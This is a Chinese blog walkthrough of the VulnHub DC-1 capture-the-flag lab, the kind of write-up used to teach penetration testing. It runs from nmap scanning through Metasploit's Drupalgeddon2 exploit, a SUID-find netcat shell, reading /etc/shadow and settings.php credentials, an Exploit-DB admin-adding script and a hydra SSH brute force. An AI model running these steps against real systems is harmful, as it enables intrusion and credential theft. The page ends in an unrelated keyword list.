千家信息网

VulnHub测试靶场DC-1

发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,**IP:192.168.110.212**一.arp-scan -l查看同一区域中存活的主机.知道了ip然后我们访问主页为下图:先信息搜集使用nmap进行端口扫描发现扫描的端口如下:22(ssh)
千家信息网最后更新 2025年12月01日VulnHub测试靶场DC-1

**

IP:192.168.110.212

**

一.arp-scan -l查看同一区域中存活的主机.

知道了ip然后我们访问主页为下图:

先信息搜集使用nmap进行端口扫描发现扫描的端口如下:

22(ssh)  80(http) .   111(rpcbind)22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)| ssh-hostkey: |   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)80/tcp  open  http    Apache httpd 2.2.22 ((Debian))|_http-generator: Drupal 7 (http://drupal.org)| http-robots.txt: 36 disallowed entries (15 shown)| /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt|_http-server-header: Apache/2.2.22 (Debian)|_http-title: Welcome to Drupal Site | Drupal Site111/tcp open  rpcbind 2-4 (RPC #100000)| rpcinfo: |   program version    port/proto  service|   100000  2,3,4        111/tcp   rpcbind|   100000  2,3,4        111/udp   rpcbind|   100000  3,4          111/tcp6  rpcbind|   100000  3,4          111/udp6  rpcbind|   100024  1          35108/tcp6  status|   100024  1          37240/udp6  status|   100024  1          37414/udp   status|_  100024  1          51353/tcp   statusService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.83 seconds

版本:
内容管理系统(CMS)Drupal7
Web 服务器 Apache2.2.22
编程语言 PHP5.4.45
操作系统 Debian
JavaScript 库 jQuery1.4.4

二.信息搜集完之后我是先开始从https://www.exploit-db.com/?type=webapps这个根据他的版本来进行搜索的,但是最后没有结果,最后从主页下的手 ,从主页看出他的cms是Drupal
之后在网上查的关于他的漏洞


三.直接使用msf进行查询search drupal,因为有好多,我先利用的是时间较近的
unix/webapp/drupal_drupalgeddon2模块

直接set设置ip使用run -j,之后直接拿到shell

输入python -c 'import pty;pty.spawn("/bin/sh")'

四.查看他的系统uname -a发现是linux

Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux

之后提权我是在网上找的方式
现在使用suid进行提权先find查找
find / -user root -perm -4000 -print 2>/dev/null
发现Find命令也是以Suid权限运行的话,则将通过find执行的所有命令都会以root权限执行。

五.我先自己创建了一个文本文件然后输入:find chen -exec whoami \;

find chen -exec netcat -lvp 5555 -e /bin/sh \;

六.另一边进行监听

七.提权成功 我先在etc下面的shadow里面找到的flag4:flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWC
继续查看敏感文件/var/www下面找到了1 它提示:每一个好的CMS都需要一个配置文件,你也一样。

八.所以之后我在网上查了drupal 的配置文件在哪里
/sites/default/settings.php
之后先find查询的


cat /var/www/sites/default/settings.php 在这块看到了他的用户名和密码

 'username' => 'dbuser', 'password' => 'R0ck3t',

既然知道了他的用户和密码就可以进行连接

九.使用cat 查看他的配置文件里的版本信息

cat /var/www/includes/bootstrap.inc | grep VERSION

得到VERSION', '7.24
刚开始使用searchsploit Drupal都是一些python脚本

 python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.110.212 -u chen -p chen

十.从刚刚使用python脚本添加的用户和密码来进行登陆

十一.因为前面已经知道他的用户名(在shadow里面找的用户名所以现在可以直接拿九头蛇爆破)

hydra -l flag4 -P pass.txt  ssh://192.168.110.212

十二.现在可知道他的 密码为orange
进行连接成功!!!!!

用户名:flag4
密码:orange

用户 密码 文件 用户名 主页 信息 版本 系统 配置 成功 命令 权限 端口 脚本 查询 输入 操作系统 下图 主机 内容 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 网络安全保密讨论稿 服务器主板内存混插问题 怎么创我的世界服务器 网络技术风险及规避方案怎么写 网络安全宣传小视频怎么做 研祥服务器 软件开发专业都包含什么 网络安全从我做起主题征文 服务器 1u 风扇 软件开发公司管理办法 泰拉瑞亚国际服务器无规则 新的数据库技术 乌鲁木齐ibm服务器维保费用 浙江棋牌游戏软件开发公司 健全防范化解网络安全风险机制 中国人寿网络安全演练 村级网络技术不成熟如何解决 网络安全周主题党日通知 服务器存储管理规定 奉贤区推广软件开发定制价格 原神服务器不一样可以加好友吗 巨杉数据库5.0三大技术亮点 2021河南省网络安全答案 ucloud数据库价格表 数据库有关的安全有哪些技术 合成科技萌彩网络技术工作室 软件开发怎么避免返工 恐鬼症服务器连接超时 数据库如何进行索引优化 珠海搞网络安全的公司
0